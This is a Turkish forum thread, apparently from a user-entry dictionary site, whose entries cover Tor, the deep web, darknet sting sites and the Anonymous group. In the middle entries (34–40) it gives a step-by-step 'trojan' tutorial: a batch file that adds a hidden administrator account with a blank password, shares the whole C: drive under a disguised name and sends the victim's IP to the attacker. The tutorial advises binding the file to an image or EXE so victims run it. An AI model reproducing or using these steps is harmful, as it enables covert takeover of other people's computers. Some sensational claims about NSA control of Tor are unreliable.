1. 26.
    +1
    Aslında Tor Ağı, temel olarak bir VPN servisi ile benzerlik gösteriyor. Tor Browser ile erişilen Tor Ağı, kullanıcıyı Dünya üzerindeki birçok noktadaki farklı bilgisayarlar üzerinden geçiren bir bağlantı sağlıyor. Yani VPN servisinde olduğu gibi Dünya’nın belli bir noktasındaki sunucudan değil de, birçok farklı bölgedeki birçok farklı bilgisayarlar üzerinden erişim sağlıyor.
    ···
  2. 27.
    +1
    NSA, Tor Ağı'nı Kontrol Ediyor!

    Tor Ağı’nın bu tarz gizli dolaşım vaat etmesi, Deep Web altındaki Darknet siteleri için kullanılırken, ayrıca illegal işler ile uğraşan kimselerin de, uğrak alanlarından oluyor. Tor Ağı’nın bu denli suç gerektiren işler için araç olarak kullanılmasının artış göstermesi, NSA tarafından da, üzerinde yoğunlaşılması gereken bir alan olarak değerlendirilmiştir.
    ···
  3. 28.
    +1
    Tor Ağı ile Deep Web ilişkisine geri dönecek olursak, görülebileceği üzere Deep Web veya farklı bağlantıları suç gerektiren eylemler ile kullanmak, büyük sonuçlar ortaya çıkartabiliyor. Tor Browser kullanarak, Tor Ağı üzerinden Deep Web veya Darknet sitelerine ulaşmanın mümkün olduğunu belirtmiştik. Ancak sadece Tor Browser ile ilk bölümde bahsi geçen sitelere ulaşmak mümkün değildir. Öyle ki, özellikle Darknet kapsamında bulunan siteler, bildiğimiz internet siteleri gibi “.com” veya “.net” gibi uzantılara sahip değiller...
    ···
  4. 29.
    +1
    Deep Web sitelerinin farkları nelerdir?

    Genel olarak “.onion” uzantısına sahip olan Deep Web sitelerine ulaşmak mümkündür. Zira bu uzantıya sahip Deep Web siteleri, medyada çokça adı geçen sitelerden oluyor. “.onion” uzantısı ise kabaca Tor Ağı aracılığında olan siteler anldıbına gelmektedir. Medya da popüler olarak kullanılan ve birçok farklı sansasyon getirecek konularla sunulan asılsız siteler, genelde “.onion” uzuntısına sahiptir. Ancak bu siteler, özellikle FBI gibi güvenlik kurumlarının “Oltalama” olarak tabir edilen aldatmaca sitemleri sonucu, yakalanmalar ile sonuçlanıyor.
    ···
  5. 30.
    +1
    Darknet ve Tor Ağı için alınan önlemler!

    Bu konu için de kısa bir paragraf açmak gerekirse, elbette ki FBI gibi başlıca güvenlik teşkilatları, Deep Web içerisinde satılan veya yayınlanan silah yapımı/satışı, uyuşturucu üretimi bilgileri ve satışları, kiralık katillerin ilanları, siyah şapkalı yani bilgisini kötüye kullanan hackerların ilanları gibi alanlara ilgi duyan veya suç işleme meyilli kimseleri yakalamak adına, “Oltalama” olarak anılan sahte Darknet steleri açıyorlar.
    ···
  6. 31.
    +1
    Böylece hem bu sitelerle çalışmak isteyen kimseleri ele geçirmeyi amaçlıyor, hem de benzer diğer sitelere sahip kimseleri, kendileriyle iletişime geçirebilmeye çalışıyorlar. Durumun böyle olması da sizi, ortalarda dolaşan sahte veya oltalama sitelere ulşatırma ihtimalini güçlendiriyor. Ancak her ne kadar böyle bir güvenlik takibi bulunsa da, ilk bölümde de geçen kategorilerde iş yapan siteler de, ciddi anlamda aktivite göstermektedir.
    ···
  7. 32.
    +2
    DarkNet Siteleri ne kadar gerçek?

    Çoğunlukla savsata olarak değerlendirilen bu suç gerektiren kategorilerde yer alan Darknet siteleri, kurucuları tarafından büyük bir hassasiyetle gizli tutulmaya çalışılıyor. Daha önce de belirtildiği gibi, herhangi bir arama motoru ile Deep Web sitelerine ulaşmak mümkün değildir.

    Aslı olan Darknet siteleri de genel olarak IP tabanlı erişime imkan sunarlar ve bu adreslerin bilgileri sadece el altından, ciddi alıcı olduğuna inanılan kişilere ulaştırılır. Yani gerçek anlamda, silah satışı, kiralık katil ilanı veya sahte pasaport temini sağlayan sitelere ulaşmak, ciddi anlamda güçtür.
    ···
  8. 33.
    +3
    Dolayısıyladır ki, özellikle merak için Tor Ağı’nı kullanan ve Darknet sitelerine erişmek isteye kimseler, sahte veya ortalama siteler ile karşılaşmaları muhtemel kimselerden olabilirler. Bununla beraber Tor Ağı kullanıyor olmaları da, IP adreslerinin bir yerlerde iz bırakmasıyla da sonuçlanıyor olacaktır.
    ···
  9. 34.
    +2
    Trojan Nasil Yapilir?
    Evet arkadaslar, konunun basligindan da anlayabileceginiz gibi Anti Virus programlari tarafindan taninmayan tamamen size ait bir trojan yapmayi size kisaca anlatacagim;

    Trojanin ana amaci, adindan da anlasilacagi gibi hedef sisteme sizarak ya ele gecirmek ya da bilgi toplamaktir. Dikkat edin zarar vermek demiyorum cünkü bu etik olarak yanlis bir harekettir
    ···
  10. 35.
    +4
    Piyasada bu konuda son derece fonksiyonel bircok Trojan var fakat bu trojanlari kodlayanlarin hepsi Ticari amac güttükleri icin ki bu konuda da sonuna kadar haklidirlar, Trojanlarin Special Edition olan versiyonlarinin disindaki tüm Public versiyonlari maalesef AV lerce taninmakta ve hepsinden önemlisi Firewallar tarafindan bloke edilmektedirler ve bu da kullanicilarin isini oldukca zorlastirmaktadir.
    ···
  11. 36.
    +2
    Size simdi anlatacagim yöntem, biraz mantik biraz da teknik bilgi gerektirmektedir. Bu ikisinin disinda baska hicbir toola ihtiyaciniz yoktur.

    Simdi Trojanimizi hazirlamaya baslayalim;

    1-) Öncelikle bir TXT dosyasi acin ve icine su komutu girin;

    net user HACK /add

    Bu komut sayesinde kurbanin makinasinda "HACK" isminde bir user yarattik. Fakat bu user hesabi normal olarak acildigi icin haklari da sınırlı olacaktir. Bu nedenle ikinci asamaya geciyoruz;
    ···
  12. 37.
    +5
    2-) Simdi yukaridaki komutun hemen bir alt satirina gecin ve su komutu ekleyin;

    net localgroup administrators HACK /add

    Böylece "HACK" isimli kullanici hesabini, direk Administrator grubuna kattik. Artik "HACK" hesabimiz tüm yetkilere sahip.

    3-) Simdi de kurbanimizin makinasindaki C: sürücüsünü sınırsız paylasima acacagiz. Kurbani da huylandirmamak icin paylasim adini SYSTEM olarak set edecegiz. Bunun icin asagidaki komutu kullanacagiz;

    net share system=C: /unlimited

    Ewet artik Kurbanimizin makinasini sonuna kadar actik. Peki kurbanin IP sini nereden bilecegiz de kurbanin makinasina bu yarattigimiz "HACK" hesabindan baglanacagiz?

    Bunun icin de kodumuza bir satirlik bir komut daha ekleyecegiz;
    ···
  13. 38.
    +2
    4-) NET SEND komutunu kullanarak kurbanin bize Windowsun Messaging Servisi vasitasi ile mesaj atmasini ve IP sini bize söylemesini saglayacagiz. Bunun icin asagidaki komutu da kodunuzun icerisine ekleyin;

    net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbaninim Gel bana baglan

    Unutmayin 82. li baslayan IP adresi yerine kendi IP nizi yazin.
    ···
  14. 39.
    +2
    4-) Son olarak ufak bir önlem alacagiz. Peki nedir bu önlem? Bildiginiz gibi Windows Messenger Servisini kullanan internette ortalikta gezinen bircok ufak tefek Spylar oldugu icin Messenger servisi genelde Disabled 'dir. Disabled olursa NET SEND komutu bir ise yaramaz. DOS komut satirinda yardimci ekler olmadikca da herhangi bir Disabled servisi Enable bildigim kadari ile edemeyiz. Fakat eger Disabled degil de Manuel ise o zaman Messenger servisini calistirabiliriz. Bu son önlemimizde de Manuel olan ve calismayan Messenger servisini calistiracagiz.

    Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz adini ögreniyoruz. Adi Messenger 'mis. simdi bu adi kullanarak bu servisi calistiriyoruz.

    net start Messenger

    Size tavsiyem, bu son komutu kodunuzun en basina koymaniz. Böylelikle ardigib sirada önce Messenger servisi calistirilacak daha sonra diger islemler yapilacaktir. Kodun saglikli calismasi acisindan bu 4. şıkkı ilk siraya koymaniz daha iyi olur.

    Son olarak TXT de yazdiginiz kodunuzu .bat olarak istediginiz bir isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile birlestirin isterseniz kurbaniniza direk gönderin.

    Kurbaniniz bu dosyayi calistirdigi an makinasinda Admin haklarina sahip HACK adinda bir user acilacak ve sifresi de blank yani bos olacaktir. C: sürücüsü de full olarak paylasima acilmis olacak ve son olarak da IP si size gelecektir.
    ···
  15. 40.
    +2
    Artik IP sini de bildiginize göre, ister DOS komut satirina düserek direk HACK kullanicisina baglanabilir istediginizi yapabilirsiniz ister Essential Net Tools türünden bir program ile paylasima actirdiginiz C: sürücüsüne sizar istediginizi yaparsiniz.

    Isin en güzel tarafi, yukaridaki BAT dosyasinin tamamen Microsoftun bize sundugu DOS komutlari kullanilarak hazirlanmis olmasi nedeni ile hicbir Anti Viruse yakalanmamasi ve "HACK" kullanicisina direk Admin olarak baglandiginiz icin hicbir personal firewall tarafindan engellenmemesidir.
    ···
  16. 41.
    +1
    internet, çok çeşitli insanlara faaliyet gösteren bir mecra. iyisinden kötüsüne herkes bu ekosistemin bir parçası. Anonymous için çoğu zaman "haktivist bir gurup" tabiri kullanılsa da hackerlardan başka kimse, yapılan saldırının arkasındaki ismi bilmiyor. Hatta bu hackerlerın birbirini tanıdığını söylemek bile olası değil. Peki, Anonymous nedir? kimlerden oluşur?
    ···
  17. 42.
    +1
    Anonymous ilk olarak nerede çıktı?

    Anonymous ilk olarak bir imageboard olan 4chan'da meydana çıktı. Zaten 4chan kullanıcılarına sunduğu anonim olma seçeneğiyle bilinen bir mecradır. içinde barındırdığı elliden fazla kategori altında insanlar, anonim (size ulaşabilecekleri herhangi bir isim, link ya da adres olmadan) olarak paylaşım yaparlar. 4chan, düşünce özgürlüğünü desteklese de son zamanlarda bu politikasından vazgeçmiş ve birçok kullanıcısını kaybetmiştir. Anonymous topluluğunun halen bu gurubun içinde olup olmadığı ise bilinmiyor.
    ···
  18. 43.
    0
    Anonymous nedir? kimdir ve ne iş yapar?

    Anonymous kendisini merkezsizleştirilmiş, içinde herhangi bir emir komuta zinciri barındırmayan, emirler yerine ideolojilere gönül vermiş ve internette toplanmış bir birlik olarak tanıtır. Anonymous yaptığı DDoS -Distributed Denial of Service- saldırılarıyla gündeme geldi ve o süreden sonra dünyanın en çok bilinen hacker gurupları arasında yer almaya başladı.
    ···
  19. 44.
    0
    ilk olarak bu işi sadece eğlence için yapan hacktivist gurup, Scientology Klisesi'ne -insanın tanrısal bir varlık olduğuna inanan dini inanç- yaptığı saldırıyla gündeme geldi. Daha sonrasında gözünü bilgi saklayan medya organlarına çeviren gurup, bu alanda da faaliyet gösterdi. Amerika, israil, Tunus, Uganda, IŞiD'e saldırılarda bulunan gurup PayPal, Mastercard, Visa ve Sony gibi firmaları da hackleyerek büyük zarar verdi.
    ···
  20. 45.
    -1
    Kendilerine "Anon" ismini veren gurup, Wikileaks ve Occupy haraketlerinin de başlangıcının merkezinde bulunuyor. Anonymous ile ilgili olabileceği düşünülen ve aralarında Amerika, ingiltere, Avustralya, Hollanda, ispanya ve Türkiye'nin bulunduğu altı ülkede, onlarca kişi tutuklandı. Anonymous destekçileri, gurubu "Özgürlük Savaşçıları" veya "Dijital Robin Hood" gibi isimlerle anarlar.
    ···